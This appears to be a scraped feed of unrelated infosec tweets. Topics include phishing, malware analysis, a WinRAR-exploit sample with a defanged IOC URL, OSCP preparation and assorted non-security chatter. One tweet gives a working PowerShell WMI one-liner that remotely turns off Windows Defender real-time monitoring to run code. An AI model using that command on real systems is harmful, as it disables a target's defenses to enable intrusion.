New stats indicate half of all phishing sites now begin with https:// < The old "look for the padlock" security advice has never been more useless and dangerous krebsonsecurity.com/2018/11/half-o…

Today is the last day of the $5 membership sale: shodan.io/store/member Countdown to when it ends: itsalmo.st/the-end-of-the…

My new mouse has 16000 DPI and a resolution accuracy of 99.4%. If this doesn’t get me to Top 500 then nothing will #Overwatch

I get contacted sometimes by the strangest of people, so I decided to have a little fun when Rihanna hit me up to wire 6 millions to her brother in Jamaica - enjoy medium.com/@hackerfantast… - scammers - Jamaican me crazy!

Follow @eventquerylang for all things EQL. Read this blogpost for some info on what EQL is, why Endgame released this technology, and what you can do with it.

# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) leapsecurity.io # Credits: Matthew Daley, Justin Gardner, Lee David Painter exploit-db.com/exploits/45939 exploit-db.com/exploits/45939

When analyzing a #malicious excel file, always looking for #vba events such as #Open, #AutoClose, ...? Surprise, there might be no such event handler (sub) in the code. In #excel, one can call a user defined function as a formula example hybrid-analysis.com/sample/a0c5468…

What a game! #FinsUp

Google Earth meets After Effects = Google Earth Studio!!! I have been privileged to do user testing for a while and it's one of my favorite tools all time! google.com/earth/studio/

Windows 10 to Get New Task Manager, Action Center and File Explorer Features - by Mayank Parmar bleepingcomputer.com/news/microsoft…

ESCTATIC to have @LeapSecurity featured on Portswigger! portswigger.net/daily-swig/chr…

TCP vs UDP

Just announced DC813 and (ISC)2 Tampa Bay will be hosting a fundraiser to help send people to infosec cons around the country. Help support the community! Fee is $50 for 2 people. Additional donations are welcome. Jan 31. 6pm Shooters World Tampa. meetup.com/Defcon813/even…

Possibly the first malware delivered through mail to exploit WinRAR vulnerability. The backdoor is generated by MSF and written to the global startup folder by WinRAR if UAC is turned off. virustotal.com/#/file/7871204… IOC: hxxp://138.204.171.108/BxjL5iKld8.zip 138.204.171.108:443

Apex Legends Fans Targeted with Malware and Scam Campaigns - by Sergiu Gatlan bleepingcomputer.com/news/security/…

As promised! My guide for Preparing for OSCP is now online! I have provided a variety of resources and information in this guide! I want to thank g0t mi1k and OffSec for approving this guide. If anyone would like to read it here it is: netsecfocus.com/oscp/2019/03/2… #oscp

Your Unifying receiver has only a mouse connected and thus keystroke injection isn't possible? Maybe ... or maybe you move your mouse and an attacker pairs a new device. (Forced pairing discovered by Marc Newlin all creds to him)

Disable defender remotely (temp) to execute code :) Invoke-WmiMethod -ComputerName 10.0.1.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -C `Set-MpPreference -DisableRealtimeMonitoring $true`"

Got my new Macbook with 32gb ram, so happy I can run Chrome and Slack at the same time and still have a gig or so left. 🤗

WANT WRITING STYLE HELP? Microsoft COMPLETELY REBUILT their Office grammar engine two years ago. However, it's OFF BY DEFAULT. Here's how to get extensive, free writing style assistance in Outlook 2016 and Word 2016: File > Options > Editor Options > Proofing > Writing Style.